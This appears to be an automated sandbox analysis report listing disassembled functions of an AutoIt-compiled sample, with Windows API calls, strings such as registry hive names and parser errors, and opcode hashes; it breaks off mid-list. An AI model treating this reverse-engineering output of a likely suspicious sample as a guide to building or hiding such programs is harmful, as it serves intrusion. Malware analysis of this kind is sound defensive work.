                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: e0cad7bf939b37232188e7e4dbe886dbd5f914efd592a860c83f89b58d0f90b5
                                    • Instruction ID: 88c42351a68394bbd75c63a999521c194a8586f432aa3555d8806dcf805737db
                                    • Opcode Fuzzy Hash: e0cad7bf939b37232188e7e4dbe886dbd5f914efd592a860c83f89b58d0f90b5
                                    • Instruction Fuzzy Hash: 8D8177715043859FCB64EF59C84496ABBE4FF8A714F18882EF889CB251E630DD49CB52
                                    Function 008F731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008F738F
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F739B
                                    • CreateCompatibleDC.GDI32(?), ref: 008F73A7
                                    • SelectObject.GDI32(00000000,?), ref: 008F73B4
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F7408
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7444
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F7468
                                    • SelectObject.GDI32(00000006,?), ref: 008F7470
                                    • DeleteObject.GDI32(?), ref: 008F7479
                                    • DeleteDC.GDI32(00000006), ref: 008F7480
                                    • ReleaseDC.USER32(00000000,?), ref: 008F748B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 7db0d38ac193c25416a510608ff22cf8e0aa09f5eb22a5bfbc0d8837ce651217
                                    • Instruction ID: 51b12b633837465dfbae9bc648ab030ca5e68a306e9b5c6a544e230d94fcd20a
                                    • Opcode Fuzzy Hash: 7db0d38ac193c25416a510608ff22cf8e0aa09f5eb22a5bfbc0d8837ce651217
                                    • Instruction Fuzzy Hash: 4E513775904209EFDB24CFA8CC85EAEBBB9FF48310F14852DFA5AD7611C771A9409B50
                                    Function 00886A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886B0C,?,00008000), ref: 008A0973
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886BAD
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00886CFA
                                      • Part of subcall function 0088586D: _wcscpy.LIBCMT ref: 008858A5
                                      • Part of subcall function 008A363D: _iswctype.LIBCMT ref: 008A3645
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: f0c01df9efce1411325a0eec5df52778a256b60e30fbf68eeefc854e2b8c4502
                                    • Instruction ID: 7448d5150a6c63ba04c9fc6f49abd2db67a13cb0b5531409cefea661cda5b68a
                                    • Opcode Fuzzy Hash: f0c01df9efce1411325a0eec5df52778a256b60e30fbf68eeefc854e2b8c4502
                                    • Instruction Fuzzy Hash: 760246711083419FC724EF28C8819AEBBE5FF99314F14492DF49AD72A2EA30D949CB53
                                    Function 008E2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E2D50
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008E2DDD
                                    • GetMenuItemCount.USER32(00945890), ref: 008E2E66
                                    • DeleteMenu.USER32(00945890,00000005,00000000,000000F5,?,?), ref: 008E2EF6
                                    • DeleteMenu.USER32(00945890,00000004,00000000), ref: 008E2EFE
                                    • DeleteMenu.USER32(00945890,00000006,00000000), ref: 008E2F06
                                    • DeleteMenu.USER32(00945890,00000003,00000000), ref: 008E2F0E
                                    • GetMenuItemCount.USER32(00945890), ref: 008E2F16
                                    • SetMenuItemInfoW.USER32(00945890,00000004,00000000,00000030), ref: 008E2F4C
                                    • GetCursorPos.USER32(?), ref: 008E2F56
                                    • SetForegroundWindow.USER32(00000000), ref: 008E2F5F
                                    • TrackPopupMenuEx.USER32(00945890,00000000,?,00000000,00000000,00000000), ref: 008E2F72
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008E2F7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    • Opcode ID: ab67d67d4ba4679fd1756a1aa4dc61c2c1f86c78dda18a4511e77823f922edc4
                                    • Instruction ID: b303a2fbcb1d92a0f0677ebe89320c024a5811d96148ea30ccf9c5db486b1577
                                    • Opcode Fuzzy Hash: ab67d67d4ba4679fd1756a1aa4dc61c2c1f86c78dda18a4511e77823f922edc4
                                    • Instruction Fuzzy Hash: B871D37160429ABEEB318F5ADC45FAABF6CFB06324F100216F625E61E1CBB15C10D791
                                    Function 008D77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • _memset.LIBCMT ref: 008D786B
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008D78A0
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008D78BC
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008D78D8
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008D7902
                                    • CLSIDFromString.COMBASE(?,?), ref: 008D792A
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008D7935
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008D793A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1411258926-22481851
                                    • Opcode ID: 95624f722d5a880562c3f16cab7ac2cfcc61c5a240cd800f23ded1604b866509
                                    • Instruction ID: 9d6836795aced9da806d493c38cf241987dff56541e480bc330b6ccded5b43b0
                                    • Opcode Fuzzy Hash: 95624f722d5a880562c3f16cab7ac2cfcc61c5a240cd800f23ded1604b866509
                                    • Instruction Fuzzy Hash: 23410872C1422DABCF21EBA8DC95DEDBB78FF14314F44452AE905E3261EA309E05DB91
                                    Function 00900E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 26398485953f2b2b9679c1f71bb8643f62c03b24c1c5dd9a472d74ada13d65a6
                                    • Instruction ID: ae6369d6440c087b64310bd589dae73d87f8cfe4a82a28d5663e40c2d520e258
                                    • Opcode Fuzzy Hash: 26398485953f2b2b9679c1f71bb8643f62c03b24c1c5dd9a472d74ada13d65a6
                                    • Instruction Fuzzy Hash: 3D419C3210032A8FDF20EF14D856BEE37A4FF52300F140424FD559B692EB74A91ADB61
                                    Function 008DF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008BE2A0,00000010,?,Bad directive syntax error,0090F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008DF7C2
                                    • LoadStringW.USER32(00000000,?,008BE2A0,00000010), ref: 008DF7C9
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • _wprintf.LIBCMT ref: 008DF7FC
                                    • __swprintf.LIBCMT ref: 008DF81E
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008DF88D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1506413516-4153970271
                                    • Opcode ID: 3c8fce7426fc4c2c4f54584fe5322b9e677830d48c749bda241eb34ab47cb2a5
                                    • Instruction ID: 9cfba07962b95eaf6477a6edb5be8129d35ce1ebf686d2b67bb90eb73e895b6d
                                    • Opcode Fuzzy Hash: 3c8fce7426fc4c2c4f54584fe5322b9e677830d48c749bda241eb34ab47cb2a5
                                    • Instruction Fuzzy Hash: C5216F3290421EEFCF11EF94CC5AEEE7B39FF14304F040466F515A61A2DA719618EB52
                                    Function 008E52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                      • Part of subcall function 00887924: _memmove.LIBCMT ref: 008879AD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E5330
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E5346
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E5357
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E5369
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E537A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: a746d7e554d8e6959d35c5a5c7f3adb24958de1af6fc69ccda624b32dea141dd
                                    • Instruction ID: f862b61870a10f52a44db00aefecc867b21ee86342ef58783be76c9e916c80c4
                                    • Opcode Fuzzy Hash: a746d7e554d8e6959d35c5a5c7f3adb24958de1af6fc69ccda624b32dea141dd
                                    • Instruction Fuzzy Hash: A4118261A5026979D720B666CC4ADFFBB7CFBD2B4CF100429B812E21D1EEA05D04CAA1
                                    Function 008E46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: dcf3114569d4e94d6f2e164908ca7dd1b1d850cf354f6e9e6a4de07b80ee1688
                                    • Instruction ID: a4383375c0bfee802da4fd16cd86ae109c182864a4aee16f8bfd3dde3d8f593a
                                    • Opcode Fuzzy Hash: dcf3114569d4e94d6f2e164908ca7dd1b1d850cf354f6e9e6a4de07b80ee1688
                                    • Instruction Fuzzy Hash: 7611273150411CAFDB20AB399C4AEDA77BCFF43315F0041B6F84AD6491EF718A819A92
                                    Function 008E4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 008E4F7A
                                      • Part of subcall function 008A049F: timeGetTime.WINMM(?,75C0B400,00890E7B), ref: 008A04A3
                                    • Sleep.KERNEL32(0000000A), ref: 008E4FA6
                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008E4FCA
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E4FEC
                                    • SetActiveWindow.USER32 ref: 008E500B
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E5019
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E5038
                                    • Sleep.KERNEL32(000000FA), ref: 008E5043
                                    • IsWindow.USER32 ref: 008E504F
                                    • EndDialog.USER32(00000000), ref: 008E5060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 8be531eee528d0c4b709ec810eef9d0acc4d0b0301ef891de59d1b1aa2caeb99
                                    • Instruction ID: 85c45bc21eac727ca51499beb1387088ede8d38e562bdd19f31dda5b9f7fefaa
                                    • Opcode Fuzzy Hash: 8be531eee528d0c4b709ec810eef9d0acc4d0b0301ef891de59d1b1aa2caeb99
                                    • Instruction Fuzzy Hash: 33219FB862CB44AFE7209F61EC98E663B69FB47749F041024F115C25B1CBA18E50FA62
                                    Function 008ED58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CoInitialize.OLE32(00000000), ref: 008ED5EA
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED67D
                                    • SHGetDesktopFolder.SHELL32(?), ref: 008ED691
                                    • CoCreateInstance.COMBASE(00912D7C,00000000,00000001,00938C1C,?), ref: 008ED6DD
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED74C
                                    • CoTaskMemFree.COMBASE(?), ref: 008ED7A4
                                    • _memset.LIBCMT ref: 008ED7E1
                                    • SHBrowseForFolderW.SHELL32(?), ref: 008ED81D
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008ED840
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008ED847
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008ED87E
                                    • CoUninitialize.COMBASE ref: 008ED880
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: 492521f06657f017226859b246a88748813b02829ff4546f667ec388a2eec563
                                    • Instruction ID: 4bf6fd2d3f7b920b5831339ec0155302da003739d0e939ec3406573ccc22f499
                                    • Opcode Fuzzy Hash: 492521f06657f017226859b246a88748813b02829ff4546f667ec388a2eec563
                                    • Instruction Fuzzy Hash: 06B12D75A00219AFDB14DFA9C884DAEBBB9FF49314F048469F809DB261DB30ED45CB51
                                    Function 008DC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 008DC283
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC295
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC2F3
                                    • GetDlgItem.USER32(?,00000002), ref: 008DC2FE
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC310
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC364
                                    • GetDlgItem.USER32(?,000003E9), ref: 008DC372
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC383
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC3C6
                                    • GetDlgItem.USER32(?,000003EA), ref: 008DC3D4
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC3F1
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC3FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                    • Instruction ID: a75a6eb7e8f3dc62cb28702568a3cbf1315846267be3e317152e4838159b5411
                                    • Opcode Fuzzy Hash: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                    • Instruction Fuzzy Hash: FF511171B10205AFDB18CFA9DD99A6EBBBAFB88711F148129F515D7390D7719D00CB10
                                    Function 008821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetSysColor.USER32(0000000F), ref: 008821D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
